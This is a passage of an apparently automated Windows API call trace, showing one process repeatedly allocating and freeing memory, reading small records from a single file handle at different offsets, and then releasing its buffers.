lpNumberOfBytesRead=0x235e4c8, lpOverlapped=0x0 | out: lpBuffer=0xd209b30*, lpNumberOfBytesRead=0x235e4c8*=0x6c, lpOverlapped=0x0) returned 1 [0251.824] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194760 [0251.824] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1eba0 [0251.824] LocalAlloc (uFlags=0x40, uBytes=0xc0) returned 0xd214660 [0251.824] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f140 [0251.824] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0xd1943a0 [0251.824] LocalFree (hMem=0xd1943a0) returned 0x0 [0251.825] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0xd194320 [0251.825] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f500 [0251.825] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434110 [0251.825] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ec90 [0251.825] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e30 [0251.825] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ecc0 [0251.825] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434090 [0251.825] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ef60 [0251.825] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd194300 [0251.825] LocalFree (hMem=0xd194300) returned 0x0 [0251.825] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0xd194860 [0251.825] LocalFree (hMem=0xd209b30) returned 0x0 [0251.825] LocalFree (hMem=0xd194760) returned 0x0 [0251.825] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d3a110 [0251.825] LocalFree (hMem=0xd194320) returned 0x0 [0251.825] LocalFree (hMem=0x4434110) returned 0x0 [0251.825] LocalFree (hMem=0x4433e30) returned 0x0 [0251.825] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xd194440 [0251.825] LocalFree (hMem=0xd194860) returned 0x0 [0251.825] LocalFree (hMem=0x5d1f140) returned 0x0 [0251.825] LocalFree (hMem=0x5d1f500) returned 0x0 [0251.825] LocalFree (hMem=0x5d1ec90) returned 0x0 [0251.825] LocalFree (hMem=0x4434090) returned 0x0 [0251.825] LocalFree (hMem=0x5d1ecc0) returned 0x0 [0251.825] LocalFree (hMem=0x5d1ef60) returned 0x0 [0251.825] LocalFree (hMem=0xd214660) returned 0x0 [0251.825] LocalFree (hMem=0x5d1eba0) returned 0x0 [0251.825] LocalFree (hMem=0xd194440) returned 0x0 [0251.825] LocalFree (hMem=0x5d3a110) returned 0x0 [0251.825] bsearch (_Key=0x235e4f8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84710 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0x6e) returned 0xd20aab0 [0251.826] SetFilePointer (in: hFile=0xb48, lDistanceToMove=24064, lpDistanceToMoveHigh=0x235e4b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4b8*=0) returned 0x5e00 [0251.826] ReadFile (in: hFile=0xb48, lpBuffer=0xd20aab0, nNumberOfBytesToRead=0x6e, lpNumberOfBytesRead=0x235e4c8, lpOverlapped=0x0 | out: lpBuffer=0xd20aab0*, lpNumberOfBytesRead=0x235e4c8*=0x6e, lpOverlapped=0x0) returned 1 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194800 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1e960 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0xc0) returned 0xd214660 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1efc0 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0xd194260 [0251.826] LocalFree (hMem=0xd194260) returned 0x0 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0xd194360 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f230 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433fd0 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f050 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433ff0 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee70 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e30 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eb10 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd194300 [0251.826] LocalFree (hMem=0xd194300) returned 0x0 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0xd194440 [0251.826] LocalFree (hMem=0xd20aab0) returned 0x0 [0251.826] LocalFree (hMem=0xd194800) returned 0x0 [0251.826] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d38710 [0251.826] LocalFree (hMem=0xd194360) returned 0x0 [0251.826] LocalFree (hMem=0x4433fd0) returned 0x0 [0251.826] LocalFree (hMem=0x4433ff0) returned 0x0 [0251.827] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xd1946e0 [0251.827] LocalFree (hMem=0xd194440) returned 0x0 [0251.827] LocalFree (hMem=0x5d1efc0) returned 0x0 [0251.827] LocalFree (hMem=0x5d1f230) returned 0x0 [0251.827] LocalFree (hMem=0x5d1f050) returned 0x0 [0251.827] LocalFree (hMem=0x4433e30) returned 0x0 [0251.827] LocalFree (hMem=0x5d1ee70) returned 0x0 [0251.827] LocalFree (hMem=0x5d1eb10) returned 0x0 [0251.827] LocalFree (hMem=0xd214660) returned 0x0 [0251.827] LocalFree (hMem=0x5d1e960) returned 0x0 [0251.827] LocalFree (hMem=0xd1946e0) returned 0x0 [0251.827] LocalFree (hMem=0x5d38710) returned 0x0 [0251.827] bsearch (_Key=0x235e4f8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84738 [0251.827] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x43c64b0 [0251.827] SetFilePointer (in: hFile=0xb48, lDistanceToMove=18944, lpDistanceToMoveHigh=0x235e4b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4b8*=0) returned 0x4a00 [0251.827] ReadFile (in: hFile=0xb48, lpBuffer=0x43c64b0, nNumberOfBytesToRead=0x94, lpNumberOfBytesRead=0x235e4c8, lpOverlapped=0x0 | out: lpBuffer=0x43c64b0*, lpNumberOfBytesRead=0x235e4c8*=0x94, lpOverlapped=0x0) returned 1 [0251.827] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd1944a0 [0251.827] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1f140 [0251.827] LocalAlloc (uFlags=0x40, uBytes=0xc0) returned 0xd214660 [0251.827] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f290 [0251.827] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0xd1947a0 [0251.827] LocalFree (hMem=0xd1947a0) returned 0x0 [0251.827] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0xd1943c0 [0251.827] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f3b0 [0251.827] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433fb0 [0251.828] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f470 [0251.828] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433ee0 [0251.828] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eb10 [0251.828] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434030 [0251.828] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ea50 [0251.828] LocalAlloc (uFlags=0x40, uBytes=0x31) returned 0x5d1ba20 [0251.828] LocalFree (hMem=0x5d1ba20) returned 0x0 [0251.828] LocalAlloc (uFlags=0x40, uBytes=0x32) returned 0x5d1c0a0 [0251.828] LocalFree (hMem=0x43c64b0) returned 0x0 [0251.828] LocalFree (hMem=0xd1944a0) returned 0x0 [0251.828] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d37210 [0251.828] LocalFree (hMem=0xd1943c0) returned 0x0 [0251.828] LocalFree (hMem=0x4433fb0) returned 0x0 [0251.828] LocalFree (hMem=0x4433ee0) returned 0x0 [0251.828] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xd1947a0 [0251.828] LocalFree (hMem=0x5d1c0a0) returned 0x0 [0251.828] LocalFree (hMem=0x5d1f290) returned 0x0 [0251.828] LocalFree (hMem=0x5d1f3b0) returned 0x0 [0251.828] LocalFree (hMem=0x5d1f470) returned 0x0 [0251.828] LocalFree (hMem=0x4434030) returned 0x0 [0251.828] LocalFree (hMem=0x5d1eb10) returned 0x0 [0251.828] LocalFree (hMem=0x5d1ea50) returned 0x0 [0251.828] LocalFree (hMem=0xd214660) returned 0x0 [0251.828] LocalFree (hMem=0x5d1f140) returned 0x0 [0251.828] LocalFree (hMem=0xd1947a0) returned 0x0 [0251.828] LocalFree (hMem=0x5d37210) returned 0x0 [0251.828] bsearch (_Key=0x235e4f8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84760 [0251.828] LocalAlloc (uFlags=0x40, uBytes=0xb4) returned 0xd2176f0 [0251.828] SetFilePointer (in: hFile=0xb48, lDistanceToMove=25088, lpDistanceToMoveHigh=0x235e4b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4b8*=0) returned 0x6200 [0251.829] ReadFile (in: hFile=0xb48, lpBuffer=0xd2176f0, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x235e4c8, lpOverlapped=0x0 | out: lpBuffer=0xd2176f0*, lpNumberOfBytesRead=0x235e4c8*=0xb4, lpOverlapped=0x0) returned 1 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd1944c0 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1ee40 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0xe0) returned 0xd199750 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ea50 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433ed0 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eb10 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x39) returned 0xd1bde80 [0251.829] LocalFree (hMem=0xd1bde80) returned 0x0 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x3a) returned 0xd1bde80 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee70 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433fb0 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1e990 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433ff0 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1edb0 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434080 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1e9c0 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x23) returned 0x5d1e960 [0251.829] LocalFree (hMem=0x5d1e960) returned 0x0 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0x24) returned 0x5d1eea0 [0251.829] LocalFree (hMem=0xd2176f0) returned 0x0 [0251.829] LocalFree (hMem=0xd1944c0) returned 0x0 [0251.829] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d39710 [0251.829] LocalFree (hMem=0x4433ed0) returned 0x0 [0251.830] LocalFree (hMem=0xd1bde80) returned 0x0 [0251.830] LocalFree (hMem=0x4433fb0) returned 0x0 [0251.830] LocalFree (hMem=0x4433ff0) returned 0x0 [0251.830] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xd1944c0 [0251.830] LocalFree (hMem=0x5d1eea0) returned 0x0 [0251.830] LocalFree (hMem=0x5d1ea50) returned 0x0 [0251.830] LocalFree (hMem=0x5d1eb10) returned 0x0 [0251.830] LocalFree (hMem=0x5d1ee70) returned 0x0 [0251.830] LocalFree (hMem=0x5d1e990) returned 0x0 [0251.830] LocalFree (hMem=0x4434080) returned 0x0 [0251.830] LocalFree (hMem=0x5d1edb0) returned 0x0 [0251.830] LocalFree (hMem=0x5d1e9c0) returned 0x0 [0251.830] LocalFree (hMem=0xd199750) returned 0x0 [0251.830] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.830] LocalFree (hMem=0xd1944c0) returned 0x0 [0251.830] LocalFree (hMem=0x5d39710) returned 0x0 [0251.830] bsearch (_Key=0x235e4f8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84788 [0251.830] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1cfc00 [0251.830] SetFilePointer (in: hFile=0xb48, lDistanceToMove=27456, lpDistanceToMoveHigh=0x235e4b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4b8*=0) returned 0x6b40 [0251.830] ReadFile (in: hFile=0xb48, lpBuffer=0xd1cfc00, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x235e4c8, lpOverlapped=0x0 | out: lpBuffer=0xd1cfc00*, lpNumberOfBytesRead=0x235e4c8*=0xa2, lpOverlapped=0x0) returned 1 [0251.830] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194300 [0251.830] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1ea50 [0251.830] LocalAlloc (uFlags=0x40, uBytes=0xe0) returned 0xd199cf0 [0251.830] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1edb0 [0251.830] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e60 [0251.830] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f3b0 [0251.830] LocalAlloc (uFlags=0x40, uBytes=0x27) returned 0x5d1eba0 [0251.831] LocalFree (hMem=0x5d1eba0) returned 0x0 [0251.831] LocalAlloc (uFlags=0x40, uBytes=0x28) returned 0x5d1ee40 [0251.831] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f500 [0251.831] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434110 [0251.831] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eb10 [0251.831] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434000 [0251.831] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f260 [0251.831] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e30 [0251.831] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ed20 [0251.831] LocalAlloc (uFlags=0x40, uBytes=0x23) returned 0x5d1f290 [0251.831] LocalFree (hMem=0x5d1f290) returned 0x0 [0251.831] LocalAlloc (uFlags=0x40, uBytes=0x24) returned 0x5d1efc0 [0251.831] LocalFree (hMem=0xd1cfc00) returned 0x0 [0251.831] LocalFree (hMem=0xd194300) returned 0x0 [0251.831] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d38510 [0251.831] LocalFree (hMem=0x4433e60) returned 0x0 [0251.831] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.831] LocalFree (hMem=0x4434110) returned 0x0 [0251.831] LocalFree (hMem=0x4434000) returned 0x0 [0251.831] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xd194500 [0251.831] LocalFree (hMem=0x5d1efc0) returned 0x0 [0251.831] LocalFree (hMem=0x5d1edb0) returned 0x0 [0251.831] LocalFree (hMem=0x5d1f3b0) returned 0x0 [0251.831] LocalFree (hMem=0x5d1f500) returned 0x0 [0251.831] LocalFree (hMem=0x5d1eb10) returned 0x0 [0251.831] LocalFree (hMem=0x4433e30) returned 0x0 [0251.831] LocalFree (hMem=0x5d1f260) returned 0x0 [0251.831] LocalFree (hMem=0x5d1ed20) returned 0x0 [0251.831] LocalFree (hMem=0xd199cf0) returned 0x0 [0251.831] LocalFree (hMem=0x5d1ea50) returned 0x0 [0251.831] LocalFree (hMem=0xd194500) returned 0x0 [0251.831] LocalFree (hMem=0x5d38510) returned 0x0 [0251.832] bsearch (_Key=0x235e4f8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84a08 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x76) returned 0xd209b30 [0251.832] SetFilePointer (in: hFile=0xb48, lDistanceToMove=30912, lpDistanceToMoveHigh=0x235e4b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4b8*=0) returned 0x78c0 [0251.832] ReadFile (in: hFile=0xb48, lpBuffer=0xd209b30, nNumberOfBytesToRead=0x76, lpNumberOfBytesRead=0x235e4c8, lpOverlapped=0x0 | out: lpBuffer=0xd209b30*, lpNumberOfBytesRead=0x235e4c8*=0x76, lpOverlapped=0x0) returned 1 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd1945a0 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1eba0 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0xc0) returned 0xd214b40 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f080 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xd194500 [0251.832] LocalFree (hMem=0xd194500) returned 0x0 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0xd1943c0 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ec90 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433ed0 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f500 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e30 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ef60 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e80 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f260 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd194380 [0251.832] LocalFree (hMem=0xd194380) returned 0x0 [0251.832] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0xd1944a0 [0251.832] LocalFree (hMem=0xd209b30) returned 0x0 [0251.832] LocalFree (hMem=0xd1945a0) returned 0x0 [0251.833] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d38710 [0251.833] LocalFree (hMem=0xd1943c0) returned 0x0 [0251.833] LocalFree (hMem=0x4433ed0) returned 0x0 [0251.833] LocalFree (hMem=0x4433e30) returned 0x0 [0251.833] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xd1946c0 [0251.833] LocalFree (hMem=0xd1944a0) returned 0x0 [0251.833] LocalFree (hMem=0x5d1f080) returned 0x0 [0251.833] LocalFree (hMem=0x5d1ec90) returned 0x0 [0251.833] LocalFree (hMem=0x5d1f500) returned 0x0 [0251.833] LocalFree (hMem=0x4433e80) returned 0x0 [0251.833] LocalFree (hMem=0x5d1ef60) returned 0x0 [0251.833] LocalFree (hMem=0x5d1f260) returned 0x0 [0251.833] LocalFree (hMem=0xd214b40) returned 0x0 [0251.833] LocalFree (hMem=0x5d1eba0) returned 0x0 [0251.833] LocalFree (hMem=0xd1946c0) returned 0x0 [0251.833] LocalFree (hMem=0x5d38710) returned 0x0 [0251.833] CloseHandle (hObject=0xb48) returned 1 [0251.833] LocalFree (hMem=0x5d84300) returned 0x0 [0251.833] LocalFree (hMem=0x5c0efb0) returned 0x0 [0251.833] LocalFree (hMem=0x5c0f2b0) returned 0x0 [0251.833] LocalFree (hMem=0x44064a0) returned 0x0 [0251.833] LocalFree (hMem=0x3aaaf0) returned 0x0 [0251.833] LocalFree (hMem=0x4432e70) returned 0x0 [0251.833] LocalFree (hMem=0x4432450) returned 0x0 [0251.833] LocalFree (hMem=0x4432390) returned 0x0 [0251.833] LocalFree (hMem=0x4432db0) returned 0x0 [0251.833] LocalFree (hMem=0x386110) returned 0x0 [0251.833] LocalFree (hMem=0x5d76790) returned 0x0 [0251.833] LocalFree (hMem=0x365c50) returned 0x0 [0251.833] LocalFree (hMem=0x4432f90) returned 0x0 [0251.833] LocalFree (hMem=0x4432510) returned 0x0 [0251.833] LocalFree (hMem=0x4432c90) returned 0x0 [0251.833] LocalFree (hMem=0x4431010) returned 0x0 [0251.833] LocalFree (hMem=0x4430bf0) returned 0x0 [0251.833] LocalFree (hMem=0x4431a30) returned 0x0 [0251.833] LocalFree (hMem=0x44313d0) returned 0x0 [0251.833] LocalFree (hMem=0x4432150) returned 0x0 [0251.834] LocalFree (hMem=0x4430cb0) returned 0x0 [0251.834] LocalFree (hMem=0x44310d0) returned 0x0 [0251.834] LocalFree (hMem=0x4431310) returned 0x0 [0251.834] LocalFree (hMem=0x4431eb0) returned 0x0 [0251.834] LocalFree (hMem=0x4431250) returned 0x0 [0251.834] LocalFree (hMem=0x5d03470) returned 0x0 [0251.834] LocalFree (hMem=0x4396fa0) returned 0x0 [0251.834] LocalFree (hMem=0x4431070) returned 0x0 [0251.834] LocalFree (hMem=0x4431850) returned 0x0 [0251.834] LocalFree (hMem=0x44318b0) returned 0x0 [0251.834] LocalFree (hMem=0x4431910) returned 0x0 [0251.834] LocalFree (hMem=0x4432090) returned 0x0 [0251.834] LocalFree (hMem=0x44321b0) returned 0x0 [0251.834] LocalFree (hMem=0x4431550) returned 0x0 [0251.834] LocalFree (hMem=0x4431370) returned 0x0 [0251.834] LocalFree (hMem=0x5c0f850) returned 0x0 [0251.834] LocalFree (hMem=0x5c0f310) returned 0x0 [0251.834] LocalFree (hMem=0x5c0fbb0) returned 0x0 [0251.834] LocalFree (hMem=0x5c10870) returned 0x0 [0251.834] LocalFree (hMem=0x5c10990) returned 0x0 [0251.834] LocalFree (hMem=0x44044f0) returned 0x0 [0251.834] LocalFree (hMem=0x4404d90) returned 0x0 [0251.834] LocalFree (hMem=0x4404790) returned 0x0 [0251.834] LocalFree (hMem=0x44049d0) returned 0x0 [0251.834] LocalFree (hMem=0x4404f10) returned 0x0 [0251.834] LocalFree (hMem=0x4404f70) returned 0x0 [0251.834] LocalFree (hMem=0x4404fd0) returned 0x0 [0251.834] LocalFree (hMem=0xd1e11a0) returned 0x0 [0251.834] LocalFree (hMem=0xd1e1aa0) returned 0x0 [0251.834] LocalFree (hMem=0xd1e1b00) returned 0x0 [0251.834] LocalFree (hMem=0xd1e0d20) returned 0x0 [0251.834] LocalFree (hMem=0xd1df100) returned 0x0 [0251.834] LocalFree (hMem=0xd1df160) returned 0x0 [0251.834] LocalFree (hMem=0xd1e0b40) returned 0x0 [0251.834] LocalFree (hMem=0x44067a0) returned 0x0 [0251.834] LocalFree (hMem=0x44079a0) returned 0x0 [0251.834] LocalFree (hMem=0x4406a40) returned 0x0 [0251.834] LocalFree (hMem=0x4406e60) returned 0x0 [0251.834] LocalFree (hMem=0x4406380) returned 0x0 [0251.834] LocalFree (hMem=0x44070a0) returned 0x0 [0251.834] LocalFree (hMem=0x5d02bd0) returned 0x0 [0251.834] LocalFree (hMem=0x5d031d0) returned 0x0 [0251.834] LocalFree (hMem=0x5d036b0) returned 0x0 [0251.835] LocalFree (hMem=0x5d03770) returned 0x0 [0251.835] LocalFree (hMem=0x5d03bf0) returned 0x0 [0251.835] LocalFree (hMem=0x4397660) returned 0x0 [0251.835] LocalFree (hMem=0x4397060) returned 0x0 [0251.835] LocalFree (hMem=0x4395b00) returned 0x0 [0251.835] LocalFree (hMem=0x3aaa90) returned 0x0 [0251.835] LocalFree (hMem=0x3a9fb0) returned 0x0 [0251.835] LocalFree (hMem=0x3aa0d0) returned 0x0 [0251.835] LocalFree (hMem=0x386830) returned 0x0 [0251.835] LocalFree (hMem=0x386230) returned 0x0 [0251.835] LocalFree (hMem=0x386290) returned 0x0 [0251.835] LocalFree (hMem=0x5d76c10) returned 0x0 [0251.835] LocalFree (hMem=0x5d767f0) returned 0x0 [0251.835] LocalFree (hMem=0x3653b0) returned 0x0 [0251.835] LocalFree (hMem=0x365bf0) returned 0x0 [0251.835] LocalFree (hMem=0x4375880) returned 0x0 [0251.835] LocalFree (hMem=0x3355b0) returned 0x0 [0251.835] LocalFree (hMem=0x4431c10) returned 0x0 [0251.835] LocalFree (hMem=0x4430ad0) returned 0x0 [0251.835] LocalFree (hMem=0x44314f0) returned 0x0 [0251.835] LocalFree (hMem=0x4431d90) returned 0x0 [0251.835] LocalFree (hMem=0x4431d30) returned 0x0 [0251.835] LocalFree (hMem=0x4430b30) returned 0x0 [0251.835] LocalFree (hMem=0x4431130) returned 0x0 [0251.835] LocalFree (hMem=0x4431f70) returned 0x0 [0251.835] LocalFree (hMem=0x4430a70) returned 0x0 [0251.835] LocalFree (hMem=0x4431df0) returned 0x0 [0251.835] LocalFree (hMem=0x4431e50) returned 0x0 [0251.835] LocalFree (hMem=0x4431c70) returned 0x0 [0251.835] LocalFree (hMem=0x4431cd0) returned 0x0 [0251.835] LocalFree (hMem=0x44320f0) returned 0x0 [0251.835] LocalFree (hMem=0x4431970) returned 0x0 [0251.835] LocalFree (hMem=0x44312b0) returned 0x0 [0251.835] LocalFree (hMem=0x4430d70) returned 0x0 [0251.835] LocalFree (hMem=0x4430b90) returned 0x0 [0251.835] LocalFree (hMem=0x4431a90) returned 0x0 [0251.835] LocalFree (hMem=0x4430c50) returned 0x0 [0251.835] LocalFree (hMem=0x44319d0) returned 0x0 [0251.835] LocalFree (hMem=0x4430f50) returned 0x0 [0251.835] LocalFree (hMem=0x4431af0) returned 0x0 [0251.835] LocalFree (hMem=0x4431430) returned 0x0 [0251.835] LocalFree (hMem=0x4430a10) returned 0x0 [0251.836] LocalFree (hMem=0x44315b0) returned 0x0 [0251.836] LocalFree (hMem=0x4431b50) returned 0x0 [0251.836] LocalFree (hMem=0x4430d10) returned 0x0 [0251.836] LocalFree (hMem=0x4430dd0) returned 0x0 [0251.836] LocalFree (hMem=0x4430e90) returned 0x0 [0251.836] LocalFree (hMem=0x4431490) returned 0x0 [0251.836] LocalFree (hMem=0x4431f10) returned 0x0 [0251.836] LocalFree (hMem=0x4431fd0) returned 0x0 [0251.836] LocalFree (hMem=0x4430e30) returned 0x0 [0251.836] LocalFree (hMem=0x4430ef0) returned 0x0 [0251.836] LocalFree (hMem=0x4432030) returned 0x0 [0251.836] LocalFree (hMem=0x4430fb0) returned 0x0 [0251.836] LocalFree (hMem=0x4431bb0) returned 0x0 [0251.836] LocalFree (hMem=0x4431190) returned 0x0 [0251.836] LocalFree (hMem=0x44311f0) returned 0x0 [0251.836] LocalFree (hMem=0x4431610) returned 0x0 [0251.836] LocalFree (hMem=0x4431670) returned 0x0 [0251.836] LocalFree (hMem=0x44316d0) returned 0x0 [0251.836] LocalFree (hMem=0x4431730) returned 0x0 [0251.836] LocalFree (hMem=0x4431790) returned 0x0 [0251.836] LocalFree (hMem=0x44317f0) returned 0x0 [0251.836] LocalFree (hMem=0x5ce2060) returned 0x0 [0251.836] LocalFree (hMem=0xd197ea0) returned 0x0 [0251.836] LocalFree (hMem=0x5ce1e70) returned 0x0 [0251.836] LocalFree (hMem=0xd194280) returned 0x0 [0251.836] LocalFree (hMem=0x5ce1fc0) returned 0x0 [0251.836] LocalFree (hMem=0xd1942a0) returned 0x0 [0251.836] LocalFree (hMem=0x5ce1fa0) returned 0x0 [0251.836] LocalFree (hMem=0xd1943e0) returned 0x0 [0251.836] LocalFree (hMem=0x5ce1ee0) returned 0x0 [0251.836] LocalFree (hMem=0xd194660) returned 0x0 [0251.836] LocalFree (hMem=0x5ce1de0) returned 0x0 [0251.837] LocalFree (hMem=0xd194680) returned 0x0 [0251.837] LocalFree (hMem=0x5ce20f0) returned 0x0 [0251.837] LocalFree (hMem=0xd194700) returned 0x0 [0251.837] LocalFree (hMem=0x5ce1fb0) returned 0x0 [0251.837] LocalFree (hMem=0xd194a00) returned 0x0 [0251.837] LocalFree (hMem=0x5ce1df0) returned 0x0 [0251.837] LocalFree (hMem=0xd194b40) returned 0x0 [0251.837] LocalFree (hMem=0xd194d00) returned 0x0 [0251.837] LocalFree (hMem=0xd194ba0) returned 0x0 [0251.837] LocalFree (hMem=0xd194e20) returned 0x0 [0251.837] LocalFree (hMem=0xd194980) returned 0x0 [0251.837] LocalFree (hMem=0xd194c20) returned 0x0 [0251.837] LocalFree (hMem=0xd194ec0) returned 0x0 [0251.837] LocalFree (hMem=0xd194ee0) returned 0x0 [0251.837] LocalFree (hMem=0xd194c40) returned 0x0 [0251.837] LocalFree (hMem=0x5ce2050) returned 0x0 [0251.837] LocalFree (hMem=0xd1950a0) returned 0x0 [0251.837] LocalFree (hMem=0x5ce1f00) returned 0x0 [0251.837] LocalFree (hMem=0xd195120) returned 0x0 [0251.837] LocalFree (hMem=0xd1bdcf0) returned 0x0 [0251.837] LocalFree (hMem=0xd194c60) returned 0x0 [0251.837] LocalFree (hMem=0x5ce1e00) returned 0x0 [0251.837] LocalFree (hMem=0xd194f60) returned 0x0 [0251.837] LocalFree (hMem=0x5ce2000) returned 0x0 [0251.837] LocalFree (hMem=0xd194fa0) returned 0x0 [0251.837] LocalFree 